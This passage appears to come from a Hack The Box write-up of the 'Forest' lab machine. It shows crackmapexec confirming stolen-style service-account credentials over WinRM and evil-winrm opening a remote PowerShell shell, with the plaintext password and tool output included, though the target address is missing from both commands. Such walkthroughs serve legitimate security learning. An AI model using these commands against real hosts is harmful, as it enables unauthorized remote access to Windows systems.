Port 5985 - WinRM

Let's check whether the svc-alfresco credentials give us access through WinRM.

└─$ crackmapexec winrm -u "svc-alfresco" -p "s3rvice"  
SMB    5985   FOREST           [*] Windows 10.0 Build 14393 (name:FOREST) (domain:htb.local)
HTTP    5985   FOREST           [*]
WINRM    5985   FOREST           [+] htb.local\svc-alfresco:s3rvice (Pwn3d!)

The (Pwn3d!) marker shows that svc-alfresco can log in over WinRM, so let's get a shell.

└─$ evil-winrm -i -u "svc-alfresco" -p "s3rvice" 
Evil-WinRM shell v3.5
Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents> 

